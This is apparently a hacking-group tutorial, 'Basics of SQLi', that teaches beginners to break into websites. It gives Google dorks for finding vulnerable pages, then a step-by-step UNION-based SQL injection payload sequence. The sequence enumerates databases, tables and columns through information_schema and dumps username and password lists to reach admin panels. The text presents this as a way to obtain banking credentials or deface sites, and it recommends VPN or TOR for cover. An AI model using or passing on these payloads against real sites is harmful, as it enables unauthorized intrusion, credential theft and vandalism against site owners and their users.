Basics of SQLi

Prepared by Tatsumi (Xavier)

Disclaimer
This guide should be used for educational
and completely legal purposes only. I am
not responsible for anything that will
happen to you due to this guide.
Sorry kung ma-nosebleed kayo sa english
haha :P
What is SQL?
To put it in simple matters, SQL or MySQL is software used to
manage your database. Now if you can access this database you
can do some pretty cool stuff like get login credentials for banking or
getting the admin account for defacing. You can do pretty much
anything you want once you have accessed the admin panel.

SQL manages data in columns, rows, tables and of the such so we
will be taking a look at them.
What you will need
A computer or laptop
Access to the internet
Something to protect you like VPN or TOR
Patience
Even More Patience
The ability to try again without giving up

You should be good if you have these. Oh and I forgot a keyboard.
Getting Started
Before we can hack, we need to find a target. That we can do with google
and google dorks. Google dorks are little codes that help you look for a site
with the vulnerability. Here is a few but there are quite a few google dorks
out there.
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
Enter only one of these in google search

Once you find a target, we need to know if its vulnerable to a MySql
injection. Here is a sample URL:
http://testsite.org/article.php?id=291
Now we add a apostrophe to the end of the URL like this
http://testsite.org/article.php?id=291 then press enter. If an error
message like You have an error in your SQL syntax appears on
the website then it is vulnerable! Now we need to find the number of
column the site has. This is also easy. First remove the apostrophe
from the url then press space and type in order by 1- without the
quotation marks so it will look like:
http://testsite.org/article.php?id=291 order by 1

Continue incrementing the number 1 until you see an error that
looks like this: The site should look normal on other numbers that
are in the column range.

This is how it should look like

Remember that it will not always be 10 since the number varies from
site to site. For now we will use the example 10. Since the error
occurred when we put order by 10 that means that there is no 10
th

column and there are only 9 columns, take note of the number of
columns. Remember this number changes from site to site. Now do
this. We need to know what column is vulnerable to an injection.
http://testsite.org/article.php?id=-291 union all select 1,2,3,4,5,6,7,8,9
Do exactly what I did including the dash between the number and
equals sign. Change the 1-9 with the number of columns you have.
For example you have 6 columns then you do union all select
1,2,3,4,5,6. By doing this numbers should pop out on the web
page.
Take note of all the numbers that you see. In my case the numbers
that showed up are 3 and 4 but they might differ with you. Now we
need to find the SQL database version. If it is above 5 then we can
continue. Do this by replacing ONE of the numbers that you see
with this code @@version. So your URL will look like this:
http://testsite.org/article.php?id=-291 union all select 1,2,@@version,4,5,6,7,8,9
So if you have 5 columns and the numbers that pop out are 1 and 2
you can choose either union all select @@version,2,3,4,5 or
union all select 1,@@version,3,4,5. As long as you replace it
with one of the numbers that pop out. It should look like this:

In my case that is the version. As long as it is above 5 you are good
to go. Now we need to find the main database. To do this replace
the @@version code to concat(database()). It should look like
this:
In my case the main database name is flasin_sparkms. Take note
of whatever database name you got. This is vital for completing
SQL injection. Now we need to show the tables the database has.
We can do this by replacing concat(database()) with
group_concat(table_name) but dont press enter yet, we still need
to add some black magic to the url by doing this. At the end of the
URL remove the and insert this text from
information_schema.tables where table_schema=database()
your url should look like this:
http://testsite.org/article.php?id=-291 union all select
1,2,group_concat(table_name),4,5,6,7,8,9 from information_scema.tables where
table_schema=database()
Press enter then it should look like this:

Now most the these tables are useless but 1 catches the eye. That
is the users table. We want to access that. Sometimes its not
always called users it might be user or userinfo or any similar name.
Now we want to enter the table. But first you need to do something.
We need the hexadecimal of the chosen table. You can google
TextToHex and enter your text for hexing. Users in hex form is
7573657273 but if users is not the table name then just get it
yourself. Now change group_concat(table_name) to
group_concat(column_name) change information_schema.tables
to information_schema.columns and change table_schema to
table_name and change database() to 0x(your hex here)
without the parentheses. Then hit enter and it should look like this:

Again whatever you see differs
from website to website.
Now you would see 2 very interesting things, that is username and
password. We want these info. Now remember we have 3 key
information by this point. Database name which is flashin_sparkms
for me, main table which is users, and 2 table contents which is
username and password. union all select
group_concat(contentName),2,3,4,5,6,7,8,9
from databaseName.mainTable
Now where the red text is replace it with your own data that you
have. You will receive the username list with contentName =
username and password list when contentName = password.
Username list should look like this.

Now you might find passwords like
these:

That means they are hashed.
The passwords are hashed in md-5 and can only be recovered if
you can decrypt this. There is a VERY SMALL chance that you will
be able to decrypt this using online decryptors and I have not much
knowledge in decryption. If you see this then GG move on to the
next site. But if you do get their passwords, then NICE! You can
now login to the admin panel!
Finding the Admin Panel
This can sometimes be very easy or very
hard. Usually the login panel is the home
pages URL with /admin or /login or them
with .php. An easier method would be
using an Admin Page Finder or a scanner
of sorts. If you have logged in feel free to
mess around with the site .
Maraming Salamat!
Next tutorial I will be talking about XSS
(Cross Site Scripting) and CSRF (Cross
Site Request Forgery). Paki pin post to
para lahat ng members makakakita .
Please support by liking and giving
comments and recommendations! I love
hearing feedback.
If you have any questions, dont hesitate
asking me on the group or adding me on
FB. Happy hacking!